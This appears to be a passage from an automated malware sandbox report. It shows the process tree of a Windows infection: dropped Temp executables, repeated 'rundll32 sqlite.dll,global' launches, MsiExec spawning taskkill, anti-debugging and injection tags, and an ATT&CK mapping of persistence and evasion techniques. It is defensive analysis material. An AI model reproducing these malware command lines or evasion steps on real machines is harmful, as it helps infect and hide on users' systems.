C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5976 -s 21404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3216
-
-
-
C:\Users\Admin\AppData\Roaming\4721621.scr"C:\Users\Admin\AppData\Roaming\4721621.scr" /S3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6156
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20bc9ea26f.exeThu20bc9ea26f.exe1⤵
- Executes dropped EXE
PID:5164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 2602⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20a5f7ccaa78.exeThu20a5f7ccaa78.exe1⤵PID:4692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5164 -ip 51641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5324 -ip 53241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4552 -ip 45521⤵
- Executes dropped EXE
PID:4692
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4792 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 4603⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4692
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4824 -ip 48241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5804 -ip 58041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4704 -ip 47041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3644 -ip 36441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3808 -ip 38081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4536 -ip 45361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3444 -ip 34441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 6108 -ip 61081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5096 -ip 50961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 4104 -ip 41041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:3864
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 740 -p 4968 -ip 49681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1608 -ip 16081⤵PID:6164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2496 -ip 24961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6700
-
C:\Users\Admin\AppData\Local\Temp\1CC5.exeC:\Users\Admin\AppData\Local\Temp\1CC5.exe1⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\1CC5.exeC:\Users\Admin\AppData\Local\Temp\1CC5.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5104
-
-
C:\Users\Admin\AppData\Local\Temp\2590.exeC:\Users\Admin\AppData\Local\Temp\2590.exe1⤵
- Suspicious use of SetThreadContext
PID:6448 -
C:\Users\Admin\AppData\Local\Temp\2590.exeC:\Users\Admin\AppData\Local\Temp\2590.exe2⤵PID:6400
-
-
C:\Users\Admin\AppData\Local\Temp\2590.exeC:\Users\Admin\AppData\Local\Temp\2590.exe2⤵PID:7064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 656 -ip 6561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5356 -ip 53561⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\7102.exeC:\Users\Admin\AppData\Local\Temp\7102.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1504
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 688 -p 5976 -ip 59761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4384
-
C:\Users\Admin\AppData\Local\Temp\9738.exeC:\Users\Admin\AppData\Local\Temp\9738.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
PID:4804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4160 -ip 41601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6668
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 4523⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2632
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5380 -ip 53801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4672
-
C:\Users\Admin\AppData\Local\Temp\1041.exeC:\Users\Admin\AppData\Local\Temp\1041.exe1⤵
- Modifies data under HKEY_USERS
PID:5504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 3002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 6032 -ip 60321⤵PID:3820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5504 -ip 55041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1520
-
C:\Users\Admin\AppData\Local\Temp\28EB.exeC:\Users\Admin\AppData\Local\Temp\28EB.exe1⤵PID:3400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 18522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6804
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\4CDF.exeC:\Users\Admin\AppData\Local\Temp\4CDF.exe1⤵PID:6368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 2482⤵
- Program crash
- Enumerates system info in registry
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\625C.exeC:\Users\Admin\AppData\Local\Temp\625C.exe1⤵PID:5556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 2522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6368 -ip 63681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1312 -ip 13121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5556 -ip 55561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3400 -ip 34001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:1088
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6056 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4DF442E73CB215120F077893F1D32C16 C2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3644
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F2D6352EE39EAE4097239950816AF9462⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:12304 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:12464
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C75E985C881DE8C7C7F48992E1256AF3 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:13308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5140 -ip 51401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:17288
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5344 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 4603⤵
- Program crash
- Enumerates system info in registry
PID:7056
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6968 -ip 69681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4104 -ip 41041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 8912 -ip 89121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10344
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:10500 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:10592 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10592 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11276
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 10592 -ip 105921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:15872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:8096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:9160
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1